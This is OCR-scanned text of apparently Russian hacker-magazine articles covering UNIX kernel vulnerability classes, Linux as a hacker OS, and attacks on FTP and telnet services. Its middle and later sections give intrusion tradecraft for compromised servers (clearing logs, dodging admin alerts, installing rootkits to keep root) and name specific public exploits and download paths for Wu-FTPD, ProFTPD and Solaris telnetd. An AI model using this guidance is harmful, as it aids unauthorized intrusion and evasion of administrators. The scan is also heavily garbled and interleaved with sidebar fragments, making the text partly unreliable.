ченный набор услуг. Мы будем рас- 
сматривать UNIX TimeSharing System 
V ("традиционный" UNIX), поскольку 
на ее основе построено большинство 
современных клонов UNIX. Начнем с 
того, что UNIX - независимая от плат- 
cpopmp! система. Для ее работы на ка- 
кой-либо машине достаточно лишь 
заново скомпилировать компоненты 
(написанные на С). Здесь стоит заме- 
тить, что единственный компонент, ко- 
торый все еще зависит от аппаратной 
части, - это ядро. 

Но в результате разделения аппа- 
ратно-зависимых и аппаратно-незави- 
симых компонентов ядра разработчи- 
кам удалось добиться того, что боль- 
шая часть ядра может быть перенесе- 
на на любую платформу. 

Остается малая, но аппаратно-зави- 
симая часть, которая включает следу- 
ющие компоненты: 


- запуск и инициализация системы 
на низком уровне; 

- первичная обработка внутренних и 
внешних прерываний; 

- управление памятью; 

- переключение между режимами 
пользователя и ядра; 

- части драйверов, связанные с осо- 
бенностями аппаратуры. 

Как видно, в зависимой части оста- 
лось лишь небольшое число сфунк- 
ций, которые переписывают при пере- 
Hoce OC на другую платформу. 

Давай теперь рассмотрим основ- 
ные функции и подсистемы ядра. 
При включении выполняется иници- 
ализация системы. Эта функция за- 
нимается запуском и раскруткой. 
Средство раскрутки загружает пол- 
ное ядро в память и запускает систе- 
му. Следующая функция - управле- 
ние памятью, которая отображает 
виртуальную память процессов в 
оперативку. Кроме того, этот компо- 
нент обеспечивает использование 
одних и тех же областей оперативки 


для разных процессов с использова- 
нием внешних носителей. Основны- 
ми подсистемами ядра являются под- 
система управления файлами и nog- 
система управления процессами. Ос- 
тановимся на них поподробнее, noc- 
кольку эти системы являются OCHOB- 
ным источником уязвимостей ядра. 


Подсистема управления срайлами 

В УМХ каждому файлу в соответ- 
ствие ставится некий индекс, в кото- 
ром содержатся описание размеще- 
ния информации на физическом но- 
сителе, права доступа, владелец и 
другие данные. Каждый файл имеет 
только один индекс. Когда процесс 
обращается к файлу по имени, ядро 
возвращает индекс срайла. То есть 
каждое имя является указателем. 

Индексы хранятся в файловой сис- 
теме, однако при работе с файлом яд- 
ро заносит их в таблицу индексов, ко- 
торая находится в ОЗУ. Кроме табли- 
цы индексов, ядро использует еще 
две информационные структуры: таб- 
лицу файлов и таблицу дескрипторов 
файла. Пользователь может полу- 
чить доступ к файловым дескрипто- 
рам и раскрыть информацию. 

Итак, основные компоненты сайло- 
вой системы: 

- Блок загрузки. Располагается в на- 
чале сайловой системы и содержит 
программу начальной загрузки. 

- Суперблок. Здесь обозначаются 
свойства файловой системы: размер, 
расположение свободного простран- 
ства, количество файлов и другая ин- 
формация. 

- Список индексов. Размер списка 
указывается администратором при ге- 
нерации файловой системы. 

- Информационные блоки. Содержат 
данные сфайлов, а также служебные 
данные. Информационный блок мо- 
жет принадлежать только одному 


файлу. 


Подсистема управления процессами 

После того как загрузка ядра выпол- 
нена, нужно как-то создавать, завер- 
шать и следить за существующими 
процессами и нитями (здесь нить - это 


пои чик es дет: = 
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"процесс", выполняемый на общей 
виртуальной памяти). Этим занимает- 
ся функция управления процессами и 
нитями. Ввиду мультипроцессорности 
*nix ядро обеспечивает разделение 
процессорного времени или процес- 
соров, что создает эффект парал- 
лельности выполнения разных задач. 
Ядро - это невыгружаемый компонент, 
и поэтому процесс, выполняющийся в 
режиме ядра, продолжает свое вы- 
полнение до тех пор, пока не вернет- 
ся в режим задачи либо пока не пе- 
рейдет в состояние «сна». Благодаря 
невыгружаемости ядро обеспечивает 
целостность информационных струк- 
тур и стабильность работы. 

Кроме обозначенных подсистем, су- 
ществуют также коммуникационные 
средства, которые отвечают за обес- 
печение обмена данными. Ну и замы- 
кающей функцией является програм- 
мный интерфейс, который делает воз- 
можным доступ к ядру из более высо- 
кого уровня (со стороны пользова- 
тельских процессов). 


ГОРЕ ОТ УМА, ИЛИ ПРОБЛЕМЫ 
"ИДЕАЛЬНОЙ" АРХИТЕКТУРЫ 
m Как видно из вышесказанного, ар- 
хитектура ОС в целом и архитектура 
ядра в частности - это стройная, хоро- 
шо продуманная система взаимодей- 
ствия компонентов. Однако несмотря 
на это любая *nix - уязвимая система. 
В том числе и на самом нижнем уров- 
не - ядре. Одна из основных причин 
уязвимостей ядра - возраст ОС. С og- 
ной стороны, клоны этой операцион- 
ной системы становятся популярнее 
день ото дня в течение 25 лет, и это 
уникальный случай! Кроме того, на 
протяжении этих лет наращиваются и 
возможности системы, что является 
большим плюсом. Однако качествен- 
ные улучшения структуры не успева- 
ли (и не успевают) за ростом ее воз- 
можностей. И поэтому можно утверж- 
дать, что современные варианты UNIX 
структурированы не идеально. Рас- 
смотрим основные типы уязвимостей. 


Переполнение буфера 
(buffer overflow) 

Одна из самых распространенных 
уязвимостей программного обеспече- 
ния и ОС в частности. Эту уязвимость 
вызывает небольшая ошибка, позво- 
ляющая, однако, творить чудеса. 
Ошибка переполнения буфера случа- 
ется, если в программе происходит ко- 
пирование данных без проверки сво- 
бодного места в пункте назначения 
(буфере). Когда данных слишком мно- 
го, происходит переполнение и ин- 
формация попадает за границы буде- 
ра. Умелое использование этого фак- 
та позволяет запускать произволь- 
ный код с правами переполненного 
приложения (то есть вполне может 
быть, что с правами администратора). 
Существует огромное количество та- 
кого рода уязвимостей. Главная при- 
чина уязвимости - использование не- 


которых функций стандартной библи- 
отеки языка С, не проверяющих раз- 
меры своих аргументов (например str- 
cpy, strcat, gets или sprintf), a *nix-cuc- 
темы (в TOM числе и большая часть 
ядра), как ты помнишь, почти цели- 
ком написаны на С. Актуальность 
этой уязвимости доказывает хотя бы 
последний найденный баг. В УМХ 9.х 
найдены множественные переполне- 
ния буфера в функциях strcpy() и 
p_stcopy(), позволяющие локальному 
пользователю переписывать в стеке 
значение регистра eip, что может 
привести к выполнению произволь- 
ного кода с root-npaBamn (см. ум. 5еси- 
ritylab.ru). 


Уязвимость состояния операции 

Данная проблема характерна как 
для *nix, так и для Windows. В никсах 
эта дырка обнаруживается в ядре и 
не имеет такого широкого распростра- 
нения, как переполнение буфера. 
Правильно используя данную уязви- 
мость, можно изменять файлы в сис- 
теме. С первого взгляда кажется, что 
такая возможность не представляет 
особой ценности, однако подобным 
образом могут быть получены повы- 
шенные привилегии при помощи мо- 
дификации критических файлов типа 
/etc/passwd и др. 

Если вышеперечисленные пробле- 
мы ядра носят «хронический» харак- 
тер, то следующие уязвимости - разо- 
вые, характерные для определенного 
клона и его версии: 

@. таблица перенаправления может 
быть подменена удаленными пользо- 
вателями, если посылать пакеты с 
подделанным исходным адресом; 

©. /proc/tty/driver/serial раскрывает 
точное число введенных символов 
через последовательные ссылки. В 
результате локальный атакующий мо- 
жет определить длину пароля и заде- 
ржку между нажатиями клавиш в те- 
чение ввода пароля; 

@. локальный пользователь может 
эксплуатировать уязвимость состоя- 
ния операции чтения сфрайла в систем- 
ном вызове execve(), чтобы аварийно 
завершить работу системы; 

@. уязвимость в программе обра- 
ботки ТСР-опций входящих пакетов. 
Причем уязвимость действительна, 
если в правилах встроенного фаерво- 
ла применяется tcp-option. Во всем ви- 
новата функция tcp_find_option, кото- 
рая некорректно обрабатывает поле 
длины пакета. Если это значение 
больше 127, программа зацикливает- 
ся. Таким образом, можно исчерпать 
системные ресурсы и вызвать отказ в 
обслуживании (DoS). 

Итак, мы видим, что ядра систем *nix 
уязвимы. Некоторые уязвимости воз- 
никают из-за непосредственных оши- 
бок при реализации. Другие - плоды 
изначально неправильной структуры 
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ществующих систем не удовлетворя- 
ла запросов хакера, и он решил пи- 
сать свою. Тем более Линус считал, 
что полученный опыт поможет ему 
начать и заложить базис ядра. И 
действительно, после месяцев упор- 
ной и кропотливой работы Fido-coo6- 
ществу были представлены исходбни- 
ки ядра, для сборки которого исполь- 
зовалась ОС Мих. Эта самая первая 
версия 0.0.1 OC Linux стала той "кри- 
тической массой", которая смогла раз- 
будить программистов и хакеров от 
спячки и организовать работу. Код 
ядра начал расти и развиваться. Чуть 
позже добавляется загрузчик, своя 
файловая система и основные утили- 
ты. В результате, мы имеем то, что на- 
зывается модным словом "Linux". 


АНАЛИЗ ЗАРОЖДЕНИЯ 
СИСТЕМЫ 

п Тебе, наверно, интересно, для че- 
го я так вольно и очень кратко рас- 
сказал историю Linux? Это вступле- 
ние должно подвести нас к главному 
выводу: ядро OC Linux написано ха- 
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повсеместному внедрению Linux ме- 
шает то, что пользователь должен 
иметь желание учиться. А таких ма- 
ло... Но не пасующие перед труднос- 
тями иногда полностью переходят на 
Ипих. Таким образом, система подтве- 
рждает свое звание ОС для хакеров. 


ЧТО ХАКЕРЫ НАХОДЯТ В LINUX 
и Так почему же именно Linux при- 
тягивает хакеров всего мира? Объяс- 
нить это лучше всего, сравнивая эту 
OC содругими системами. Начнем, по- 
жалуй, с самой близкой OC - FreeBSD. 
Как ты знаешь, это тоже свободно 
распространяемая, РОУХ-совмести- 
мая, доступная в исходных кодах сис- 
тема, то есть она имеет все основные 
преимущества Linux. И, кроме этого, у 
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= тих - система, написанная хакерами и для хакеров? Почему He FreeBSD, He OpenBSD, He Windows, a именно Linux 
L притягивает хакеров всего мира? Что можно делать и чего делать нельзя Ha захваченной машине? 
. 
ИСТОРИЯ керами и для хакеров. Действитель- нее есть большой плюс: она разраба- 
и Шел далекий 1991-n но, основанный программистом-оди- тывалась не с начала девяностых, а 
год. На рынке решений ночкой проект попал в руки огромно- гораздо раньше, при этом очень 
для домашних пользо- го количества грамотных програм- неглупыми людьми. Кажется, все ука- 
вателей наблюдалась мистов, которые хотели использо- зывает на явное превосходство 
монополия Microsoft. Windows 3.1 и вать свой РС с максимальной отда- FreeBSD. Но есть одно большое но: 
DOS правили миром ;-). Конечно, нахо- чей. Для них компьютер не был развивать и дополнять эту BSD-cucte- 
дились энтузиасты, использующие инструментом - для них это цель, а му могут только избранные разработ- 
другие системы, но их было очень ма- не средство. Дух свободы и творче- чики ядра. А значит, далеко не каж- 
ло. Компьютеры уже стали доступны ства пронизал систему. Линус преду- дый желающий программист может 
многим, и росло число программистов, гадал такой ход развития и выпустил отправить свой участок кода для 
готовых ринуться в бой за идею. Бла- свое творение под открытой лицен- включения в ОС. С Linux все проще: 
годаря Fido хакеры с разных концов зией. Именно эти ключевые моменты если ты профи, то твоя работа будет 
света уверенно держали связь между сформировали всю ОС. оценена по достоинству и добавлена 
собой и искали применение своему в ядро, при условии что это действи- 
интеллекту. Мир как будто ждал чего- LINUX СЕГОДНЯ тельно полезная наработка. 
то... А тем временем мало кому извест- и Сейчас мы наблюдаем бум попу- Причем дистрибутив не будет отп- 
ный студент факультета компьютер- лярности системы Linux. Интернет равлен на реализацию до тех пор, по- 
ных наук Хельсинского университета кричит, что это лучшая ОС как для ка множество бета-тестеров по всему 
Линус Торвальдс изучал операцион- серверов, так и для домашнего ис- миру не заявит об отсутствии ошибок 
При созда- ные системы, современные компьюте- пользования. Но так ли это на самом в релиз-кандидате. Таким образом, 
мы Пике ры, языки программирования, прос- деле? Действительно, сейчас FreeBSD выпускается достаточно peg- 
использовал матривал мегабайты исходных кодов. GNU/Linux представляет собой очень ко, а значит, все новые идеи включа- 
Арн Он учился. Когда пришло желание ра- мощную и надежную систему с огром- ются в нее только после тщательного 
ник - книгу ботать, у Линуса уже был огромный ным количеством приложений. При- тестирования. В то время как хакеры, 
АИ запас знаний по многим аспектам IBM чем это все доступно абсолютно бесп- — двигая прогресс, подчиняют его себе - 
ботка OC РС. Так сложилось, что ни одна из су- латно и в виде исходных кодов. Но используют свои разработки в пов- 
UNIX". 


седневной работе, тем самым всегда 
оставаясь "на острие атаки". В итоге 
FreeBSD не стала "притоном" гениев. 
Аналогично обстоят дела ис 
OpenBSD. Хоть эта платсрорма более 
открыта, но ее секьюрность и посто- 
янный аудит не дают ей возможности 
развиваться вместе с компьютерным 
миром. Поэтому и эта ОС не стала 
пристанищем свободомыслящих та- 
лантов ;-(. О Windows говорить как-то 
даже не хочется... Система, ориенти- 
рованная на домохозяйку, не может 
быть гибкой, удобной и интересной 
компьютерному aHgerpayHgy. Осталь- 
ные системы практически не предс- 
тавляют никакого интереса: либо они 
мало распространены, либо закрыты 
и недоступны для модификации. Так 


Решение о выпуске нового релиза Linux 
принимается исключительно 
централизованно. 
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Кстати, о погах... 


рис. Константин Комардин 


Даже невинное создание папки в 
каталоге /tMp может выдать атакующего 
(это очень просто реализуется 
встроенными средствами аудита ФС). 
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Осмотримся немного по процессам 


что же получит хакер, выбрав для се- 
бя ОС Ипих? Прежде всего, свободу - 
свободу выбора, свободу творчества, 
свободу от монополий и регламентов 
производителей. И уже только потом 
очень сильную сетевую ОС. 


ПОЧЕМУ АДМИНАМ 
СИМПАТИЧНА ЭТА СИСТЕМА 

и Администраторы все чаще выби- 
рают Linux для своих детищ. И это лег- 
ко объяснить. Админ получает, во-пер- 
вых, очень стабильную ОС. Во-вторых, 
постоянное обновление и совершен- 
ствование не только системы, но всего 
сетевого ПО. Полный контроль над 
операционной системой привлекает 
грамотных системщиков, правда, дос- 
тичь этого удается только в таких 
дистрибутивах, Kak Gentoo или LFS, но 
тотальная власть над системой реаль- 
на. Отсутствие всевозможных "закла- 
док" и "меток", абсолютная прозрач- 
ность межсетевого взаимодействия 
позволяют Ипих-админам спать спо- 
KONHO. И все это дополняется огром- 
ным количеством документации, как в 
интернете, так и в бумажном варианте, 
как на английском, так и на русском 
языке. Этот список преимуществ Ипих 
над другими *пх-системами можно 
продолжать довольно долго. Но! Раз 
есть админы и хакеры, то должны 
быть атаки и взломы, не так ли? Хотя 
система очень стабильна и продуман- 
на, иногда можно слышать об удачных 
взломах Мпих-хостов. Кто же виноват 
в том, что ОС отдается в руки хакера? 
Попробуем разобраться в этом. 


взлом LINUX. 
КАК ТАКОЕ БЫВАЕТ? 

и Чаще всего взломы и успешные 
атаки Ha Linux можно объяснить ли- 
бо неграмотностью, либо ленью ад- 
мина. Грамотно настроенная и вовре- 
мя обновляемая система практичес- 
ки неуязвима. 

Какие возможны атаки? Сначала по- 
говорим о самой простой. Реализовать 
взлом несложно, достаточно почаще 
посещать есигЙу-сайты и отслежи- 
вать изменения на {ор-страницах 
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Linux - это 
самая отк- 
рытая и 
свободная 
система, но 
при этом 
ядро потен- 
циально на- 
рушает 
множество 
патентов, 
по мнению 
некоторых 
компаний 
(например, 
небезызве- 
стной SCO). 


Детище ха- 
кера-оди- 
ночки угро- 
жает моно- 
полии софт- 
верного ги- 
ганта. 
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Ну и кто скажет, что ХР выглядит круче??? 


эксплоитов. При обнаружении новой 
удаленной уязвимости сразу же начи- 
нать искать эксплоит, а, пока его еще 
не разработали, исследовать сервера 
на предмет этой уязвимости. Конечно, 
в твоем сетевом анализаторе этой уяз- 
вимости еще нет, и поэтому придется 
поработать головой: провести полное 
сканирование хоста на предмет выяс- 
нения версии сервисов. При обнару- 
жении бажного релиза ожидать све- 
женького эксплоита и успевать брать 
root-Luenn. Вообще, лучше немного оп- 
тимизировать процесс поддержания 
тебя в курсе всех изменений Ha зесип- 
{у-фронте. Есть два варианта: простой 
- подписаться на рассылку, сложный - 
написать скрипт, который будет отсле- 


Команда _ 
‘who! pee живать изменения на заданных тобой 
ляет узнать Web-pecypcax no Т-безопасности, а в 
всех поль- 
зователей, случае обновления автоматически 
работаю- скидывать тебе свежачок на мыло или 
pe a мобильник (для этих целей можно ис- 
данный мо- пользовать готовый сосрт, о котором 
ГА мы неоднократно писали). Атака на 
незнание системщика гораздо слож- 
нее. Хакер должен знать Linux и его 
сервисы гораздо лучше администрато- 
ра хоста, он должен понимать всю мо- 
Некоторые дель взаимодействия сетевых компо- 
админы + 7 _ 
используют нентов между собой и с системой. Про 
скрипт, ффессиональные хакеры работают 
хе именно так: изучают ОС в совершен- 
root 'aB стве, атакуют сервера редко, но метко. 
petal Успех определяется соотношением 
сообщение твоих Т-знаний и Т-знаний админист- 
админу на ратора. Собственно, больше принци- 
мобилу. 


пиальных способов атаки нет. Все ос- 
тальные варианты представляют со- 
бой модификации этих двух. 


ЧТО МОЖНО ДЕЛАТЬ : 
CO ВЗЛОМАННОЙ СИСТЕМОЙ 

m Самое первое, что следует cge- 
лать при удачном входе, - это прове- 
рить, нет ли сейчас админа в системе. 
Таким образом, если root уже зареги- 
стрирован, то хакеру лучше уйти. 
Действовать дальше нужно только в 
том случае, если root на своем рабо- 
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Путь свободен! Только один root в системе 
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Учти, что даже банальный запуск MC 
вызовет изменения времени доступа на 
некоторых файлах. 


чем месте не обнаружен ;-). Следую- 
щий этап - разобраться с системой ло- 
гирования и регистрации пользовате- 
лей сервера. Я знаю администрато- 
ров, которые так опасаются за свой 
сервер, что создали скрипт, который 
при входе root в систему сразу отп- 
равляет администратору сообщение 
на мобильник, в котором содержится 
время входа, |Р-адрес, с которого про- 
изошла регистрация, и номер вирту- 
альной консоли, на которой работает 
сейчас суперюзер. Кроме этого, если 
не будет подтверждена регистрация, 
то сеанс завершится через опреде- 
ленный промежуток времени! Реали- 
зовано это с помощью следующего 
скрипта: при входе он создает опреде- 
ленный сфайл, и, если он не будет уда- 
лен через некоторое время, програм- 
ма считает, что произошел взлом сер- 
вера и скидывает псевдоадмина с тер- 
минала, отправляет предупреждение 
о критической ситуации настоящему 
администратору на мобильник. Поэто- 
му сразу при входе нужно вниматель- 
но изучить содержание домашнего 
каталога и просмотреть все срайлы, 
отвечающие за регистрацию. Их име- 
на зависят от оболочки-интерпретато- 
ра. Затем - изучение лог-файлов и их 
очистка. Это первые шаги. Я не слу- 
чайно так подробно описал одну из 
ловушек администратора - атакующий 
должен быть готов ко всему и очень 
хорошо знать атакуемую ОС. Без это- 
го любой админ сможет рано или 
поздно вычислить и наказать взлом- 
щика. При любых действиях в системе 
следует анализировать результат 
предельно внимательно. 

Поэтому если ты создаешь рабочий 
каталог для себя, то после окончания 
сразу удаляй и чисти логи всех опера- 
ций. Самое главное - это научиться 
думать, как администратор хоста, при- 
чем как грамотный администратор. Ес- 
ли взломщик недооценивает против- 
ника, рано или поздно он будет пой- 
ман. Поэтому бди! 


ЧЕГО НЕЛЬЗЯ ДЕЛАТЬ CO 
ВЗЛОМАННОЙ СИСТЕМОЙ 

и Никогда не следует менять пароль 
на учетную запись root. Это самое 
большое желание малограмотных 
скрипткидисов. Думая, что, сменив 
рут-пароль, они заблокируют доступ к 
серверу законного администратора, 
они очень глубоко ошибаются. Если 
админ не сможет с утра войти в систе- 
му - Linux не захочет опознать его па- 
роль, то возможны два варианта. Ес- 
ли опыта и знаний немного, то он пос- 
читает, что просто забыл ключ. Если 
же админ - матерый малый, то он сра- 


зу же узреет во всем атаку и будет 
восстанавливать пароль, параллель- 
но усилив защиту до такого уровня, 
что любой скрипткиди скорее проха- 
чит общественный сортир, чем его 
хост ;-). Кстати, процедура восстанов- 
ления пароля предельно проста: заг- 
ружаемся с CD или дискеты, монтиру- 
ем разделы сервера, смотрим 
/etc/passwd, удаляем запись пароля 
root, отмонтируем винт, ребутимся в 
Linux, логинимся с пустым пассом. Та- 
ким образом, 10-минутная остановка 
сервера стоит тебе бессонной ночи и 
утраты этого сервака - при восстанов- 
лении пароля защита будет усилена. 
Не рекомендую добавлять пользо- 
вателей на взломанную систему. 
Просто очень многие администраторы 
опасаются за безопасность своего 
хоста и ставят ловушку на команду 
"adduser", которая отправляет сооб- 
щение на почту всякий раз при созда- 
нии аккаунта пользователя, да и это 
еще не все. Некоторые сервера имеют 
сильную связь с остальными машина- 
ми сети: например, хакер взломал Dial- 
in сервер провайдера, добавил своего 
пользователя, прописал скрипты, вы- 
держал паузу и захотел попользо- 
ваться плодами своего труда. Но не 
тут-то было: сервер его пускает, но 
при попытке запуска сессии РРР про- 
цесс умирает по тайм-ауту. Причина 
проста до безобразия - машина, при- 
нимающая звонки, не имела на своем 
хосте базы пользователей! Весь бил- 
линг был на отдельном сервере, кото- 
рый и записывал в логи подозритель- 
ные запросы на несуществующего 
пользователя. После нескольких та- 
ких ошибок админ получил письмо с 
вырезкой лог-файла. И, как след- 
ствие, хакер лишился доступа Ha Dial- 
in. Поэтому не повторяй чужих оши- 
бок и никогда не добавляй пользова- 
теля, не разобравшись, как устроен 
весь механизм взаимодействия сер- 
веров. Не ставь руткитов, не изучив 
сервер полностью. Это грозит полной 
утратой аккаунта - ночные проверки 
безопасности, постоянные лог-анали- 
зы, сравнение хеш-хфункций у основ- 
ных утилит гарантированно выдадут 
действия взломщика. Чтобы этого не 
случилось, изучай систему как можно 
тщательней. Кроме этого, категори- 
чески запрещается убивать процессы 
сервера. Даже такой вредный и опас- 
ный для хакера демон, как Syslog, дол- 
жен крутиться в системе, когда он 
что-то там делает. Причина банальна - 
очень часто при остановке критичес- 
ких процессов они перезапускаются, 
а, если падают и во второй раз, - отп- 
равляют сообщение админу на мо- 
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Почему бы не войти в систему... 


бильник, в котором приведена инфор- 
мация о том, что случилось, кто и от- 
куда работает в системе, что делает и 
т.9. Как нельзя убивать чужие серви- 
сы, так нельзя и запускать своих де- 
MOHOB на сервере. Точнее, это делать 
можно и нужно, но только после уста- 
новки соответствующих руткитов, ко- 
торые смогут скрыть активность ле- 
вых приложений на хосте. 


УДЕРЖАНИЕ ROOT-AKKAYHTA 
и Если взломщик надеется подоль- 
ше удержать за собой максимальные 
права Ha Linux-cepBepe, то он дол- 
жен постараться выполнить еще 
несколько действий. Самое главное - 
это изучить всю систему и найти 
"закладки": программы и скрипты, ус- 
тановленные администратором сер- 
вера, предназначенные для поиска и 
ликвидации взломов. Наиболее по- 
пулярны gna Ипих-серверов на се- 
годня скрипт, который следит за 
подтверждением входа (следует ис- 
кать в /root файл конфигурации 
оболочки пользователя) и скрипты 
проверки хеш-суммы всех утилит 
системы. Чаще всего они запускают- 
ся с помощью Cron от root, поэтому 
следует внимательно изучать вывод 
команды crontab. Если не будет най- 
дено никаких подозрительных запи- 
сей для сгоп, то взломщику чаще 
всего необходимо изучить /var/log. 
Именно этот каталог содержит ре- 
зультаты всех проверок, если они су- 
ществуют, и в нем легко можно обна- 
ружить отчеты ловушек админа. 
Просмотрев журнал, следует поду- 
мать об установке руткита, если, ко- 
нечно, на хосте не установлена прог- 
рамма-ревизор. Ну а после успешно- 
го инсталла все становится проще: 


патченые утилиты будут прикрывать 
тебя и твои процессы в нужный мо- 
мент, а админ будет спать спокойно, 
не зная, что его сервера находятся 
под чужой властью :-). Если же адми- 
нистратор попался грамотный и уста- 
новил все возможные ловушки-ана- 
лизаторы, то тут необходимо 
действовать крайне осторожно. 

Чтобы удержаться на таком за- 
щищенном хосте, необходимо быть 
предельно внимательным, забыть 
про всякие утилиты-помощники и 
всегда чистить логи своих 
действий. Причем обязательно 
нужно следить за программой-ре- 
визором, то есть перед ее запус- 
ком на сервере не должно быть ни- 
каких следов действий хакера, как 
и самого взломщика не должно 
быть в системе :-). Общеизвестное 
правило - чем дольше изучаешь 
систему перед установкой каких- 
либо своих прог, тем больше шан- 
сов воспользоваться этими софти- 
нами в будущем. Так складывается 
ситуация, что хакер встает на борь- 
бу не только со знаниями админа, 
но и со всевозможными ловушка- 
ми, чаще всего написанными круп- 
ными [Т-специалистами. 


LINUX - ПРИТОН ХАКЕРОВ? ДА! 
м Linux был, есть и будет той един- 
ственной системой, в которой хакер 
чувствует себя предельно просто и 
комфортно. Тем, кто действительно 
хочет понять всю силу и удобство 
Linux, прямая дорога в мир source- 
Базе дистрибутивов. Только там, 
пройдя через бессонные ночи, килог- 
раммы манов, ты познаешь счастье, 
которое позволит тебе понимать мир 


хакеров. 
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Докучаев Дмитрий aka Forb (forb@real.xake 


СЕРВИСНАЯ 
УГРОЗА 


АТАКИ НА КОНКРЕТНЫЕ СЛУЖБЫ 


ь. 


ы икто не застрахован от ошибок. В сети всегда отыщется сервер с бажным демоном. Не важно, каким именно будет 
сервис. Важно то, что ты в любой момент можешь его взломать, заработав на этом системные привилегии. 


р 


нертность системных 


администраторов впе- 


чатляет. Админы реаги- 


ProFTPD и 
Wu-ftpd - 
самые ды- 
рявые сер- 
вера. Но, 
несмотря на 
это, адми- 
нистраторы 
продолжают 
их исполь- 
зовать. 


Атака брут- 
форсом 
очень 
действенна. 
Правда, та- 
кой взлом 
может про- 
должаться 
несколько 
часов. Все 
зависит от 
пропускной 
способности. 


руют на уязвимость в 
определенной службе 
лишь тогда, когда баг перерастает в 
эпидемию. В обычных случаях никто 
не мешает хакеру поиметь хороший 
ресурс через уязвимость в сервисе. 
Однако получить shell после обднок- 
ратного применения эксплоита удает- 
ся далеко не всегда. С твоего позво- 
ления, я рассмотрю особенности де- 
MOHOB включая их стойкость к раз- 
личным эксплоитам. 


ДЫРЯВЫЙ ЕТР 

и Начнем с самого низкого систем- 
ного порта. На двадцать первом порту 
расположился интересный демон ЕТР. 
Ты хочешь поломать его, но вот беда: 
не знаешь, какой FTPD выдержит ата- 
ку, а какой - нет. Публичные эксплои- 
ты встречаются для двух служб: 
WuFTPD и ProFTPD. Несмотря на ды- 
рявость они до сих пор используются 
админами в работе. Поговорим о каж- 
дом релизе в отдельности. 

Wu-FTPD. В старых версиях сервера 
таится несколько критических уязви- 
мостей, направленных, в основном, на 
переполнение бусфера. Эксплуатиро- 
вание основано на пересылке слиш- 
ком длинной команды с $Пе!-кодом, в 
результате чего у сервиса напрочь 
срывает крышу. В результате атаки 
взломщик получает полноценный 
rootshell (не стоит забывать, что по- 
давляющее число демонов работают 
из-под root’a). В простом случае тебе 
достаточно скачать эксплоит под уяз- 
вимую версию и запустить его с опре- 
деленными параметрами. Через неко- 
торое время ты получишь права су- 
перпользователя. Но довольно часто 
бывает, что админ специально подме- 
нил баннер FTPD. По понятным причи- 
нам администратор не хочет, чтобы 
его взломали, поэтому обзывает де- 
мон загадочным именем, против кото- 
рого хакер не найдет нужного экспло- 
uta. К счастью, Wu-FTPD обладает 
признаками, которые отличают его от 
сервисов других производителей. 
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Чтобы определиться в названии сер- 
виса, зацепись на него и попробуй за- 
Логиниться. Затем напиши команду 
quit. Если это действительно Wu, то ты 
увидишь полную статистику по пере- 
данным данным (причем номер коман- 
ды будет равняться числу 221). Кроме 
этого, в случае анонимного захода 
Wu-FTPD обязательно проинформи- 
рует тебя о правильности email-agpe- 
са, который задается в качестве паро- 
ля. Подобная дружелюбность позво- 
лит вывести сервер на чистую воду. 
И, наконец, эксплоиты. Конечно же, 
абсолютно все версии WUFTPD уязви- 
мы, но в публичных источниках ты мо- 
жешь найти сплоит для взлома рели- 
за 2.6.2 (wwwsecurity.nnov.ru/files/0x82- 
wu262.c), Придется довольствоваться 
тем, что есть. 

Что касается ProFTPD, то эта служ- 
ба еще дырявее. Существует экспло- 
ит gna предпоследнего релиза 
1.2.9rc2, что говорит о некомпетент- 
ности программистов. Самая попу- 
лярная ошибка в демонах FTPD - пе- 
реполнение при передаче длинного 
параметра какой-либо команде. Но 
последний эксплоит ориентирован 
на срыв буфера во время закачива- 
ния А$С!-файла. Я протестировал 
работу этого чудного эксплоита 


(www.security.nnov.ru/files/10.04.proftpd_xforce.c 
) на версии 1.2.9 и легко получил yga- 
ленного root'a. Одна проблема - в 
публичном эксплоите содержится 
всего две мишени (таргета :)). Хо- 
чешь большего? Тогда качай файл 
ru/files/proft_put_down.c. OH 
снабжен брутфорсом, поэтому явля- 
ется универсальным для всех кон- 
фигураций. 

Если админ меняет баннер от 
ProFTPD, это не говорит о том, что ха- 
кер не обнаружит баг. Демон выдает 
себя с потрохами фразой 
«Anonymous Login ok» при передаче 
анонимного логина. Для справки: все 
остальные FTPD вместо слова 
«Anonymous» пишут «Guest». Korga- 
то я раскусил службу именно по этой 
отличительной особенности. Чего и 
тебе желаю :). 


security.nnov 


SSH - НОСТАЛЬГИЯ 
ПО ВЗЛОМУ 

и Следующий сервис, который я 
опишу, - это sshd. Он висит на 22-м 
порту и служит для удаленного подк- 
лючения к серверу. Служба снабжена 
защитным алгоритмом шифрования, 
поэтому хакер никогда не отловит па- 
роль, передающийся демону. Что ка- 
сается стойкости ко взлому, то в наше 
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Печ нии леч TELNETD - ДРЕВНИЙ СЕРВИС 
т | ге 1 7 ae == > peel oe "ре 
Я" не ибо eee eer eee OT ДРЕВНИХ АДМИНОВ 
Dea Е Г Сейчас мы займемся взломом tel- 
ыыы td.H 7 В последнее 
netd. Несмотря на то что это старый время в 
—_ = сервис, он используется на многих публичных 
Поиск по фразе «SunOS exploit» ука источниках 
Фр р. unix-like-MaLuNHax. Почему же админы трудно най- 
его не сносят? Все просто - они остав- ти хороший 
ляют демон в качестве резерва, исп 


фильтруя его от внешнего мира. В 

этом случае ты не законнектишься на 
сервис, однако сможешь без проблем 
получить локального root'a, если ата- 


куешь сервер другим способом. Впро- ee 
чем, бывают и исключения. К приме- подменяют 
ру, в Солярке телнет - вообще сервис не 
по умолчанию, поэтому 23-й порт на висов, ты 
таких серверах светится всегда. От те- можешь уз- 
7 HaTb, прочи- 
бя требуется воспользоваться услуга ЕВ ТАЕЮ 
ыы аа вы os al ми одного из двух эксплоитов. Пер- в этом но- 
JBL TELE вый называется 7350 logout (exam- PSE: 


ples.oreilly.de/english_examples/net- 
worksa/tools/735Ologout), oH перепол- 
няет буфер в telnetd, засоряя ero He- 
корректными данными. Зловредный 


бинарник способен взломать службу Онены часто 


авторы 
в Солярках 5.6-5.8 за несколько се- эксплоитов 
кунд. Второй эксплоит с именем holy- VAs IOUT) 
‘ й A допускают 
grail (examples.oreilly.de/english_exam- ошибки в 
ples/networksa/tools/holygrail.c) лома- коде. Чтобы 
т о эксплоит 
ет Соляры 5.5-5.7 удаленно и 5.8 ло функциони- 
кально. Заюзать эти сплоиты неслож- ровал, тебе 
но. Достаточно лишь передать им па- аи 
раметры хоста и версии операционки. исправить. 


Кстати, версия Солярки всегда указа- » 
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Holygrail - лучшее для SunOS 


на в баннере telnetd, что в несколько 
раз облегчает твою работу. 

Бажный демон telnet'a встречается в 
других системах. Например, во 
FreeBSD. Для определенных версий 
